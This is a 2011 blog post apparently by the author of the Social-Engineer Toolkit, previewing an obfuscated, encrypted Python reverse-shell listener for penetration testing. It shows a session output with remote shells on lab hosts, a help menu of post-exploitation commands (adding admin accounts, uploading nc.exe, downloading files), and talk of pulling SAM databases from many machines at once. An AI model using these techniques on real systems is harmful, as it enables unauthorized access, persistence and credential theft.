March 03, 2011

SET v1.3 Interactive Command Shell New Addition

Written by David Kennedy
Security Testing & Analysis Social Engineering
While I have been working frantically on The Social-Engineer Toolkit (SET) v1.3, I wanted to give a little teaser on a new addition that I've been working on. I have to say this is probably one of the hardest tasks I've built into SET and coded in Python. Building a raw multi-threaded socket handler that can distinguish between inter-communicating threads and handle them in different channels was a bit of a rough task, since Python threads are pretty immature overall. Anyway, the new addition is going to be a purely Python-driven, SET-based listener and shell that handles a slew of tasks. The good news is that it's heavily obfuscated, will leverage encrypted communications, and will act as a reverse shell. My thinking here is to have a purely SET-driven interactive payload instead of leveraging Metasploit-based payloads. While the payload support within SET will still include Metasploit, this will allow additional avenues and capabilities to be put into SET, letting it grow and become more independent over time. Here is a small teaser of the shell. I don't have a release date yet; I'm hoping for the end of the month. Something to add is that the socket storage is done in memory, so theoretically I can add the ability to perform tasks on each shell at once. So if you wanted to download the SAM database on 30 systems at once, this will be possible instantaneously.

The Social-Engineer Toolkit (SET) is listening on: 0.0.0.0:80

[*] Connection received from: 172.16.32.131
[*] Establishing encrypted tunnel...

*** Pick the number of the shell you want ***

1: 172.16.32.131

Enter your numeric choice: 1

[*] Dropping into the Social-Engineer Toolkit Interactive Shell.

set>
set>
set> [*] Connection received from: 172.16.32.132
[*] Connection received from: 172.16.32.133
[*] Connection received from: 172.16.32.134

set> shell
[*] Dropping into a shell. Enter your shell commands below.

set/command_shell>ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 172.16.32.131
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 172.16.32.2

set/command_shell>quit
set> quit
[*] Exiting the Social-Engineer Toolkit (SET) Interactive Shell.

*** Pick the number of the shell you want ***

1: 172.16.32.131
2: 172.16.32.132
3: 172.16.32.133
4: 172.16.32.134

Enter your numeric choice: 3

set> [*] Dropping into the Social-Engineer Toolkit Interactive Shell.
set> shell
set> [*] Dropping into a shell. Enter your shell commands below.
set/command_shell>ipconfig
set> Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 172.16.32.133
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 172.16.32.2

set> ?

Welcome to the Social-Engineer Toolkit Help Menu. Enter the following commands for usage:

Command: shell
Explanation: drop into a command shell
Example: shell

Command: localadmin
Explanation: adds a local admin to the system
Example: localadmin bob p@55w0rd!

Command: domainadmin
Explanation: adds a local admin to the system
Example: domainadmin bob p@55w0rd!

Command: download_file
Explanation: downloads a file locally to the SET root directory.
Example: download_file C:\boot.ini

Command upload_file
Explanation: uploads a file to the victim system
Example: upload_file /root/nc.exe C:\nc.exe

set/command_shell> quit
set> localadmin testing123 asfsdfdsfdsfds
set> [*] Attempting to add a user account with administrative permissions.
[*] User add completed. Check the system to ensure it worked correctly.
set>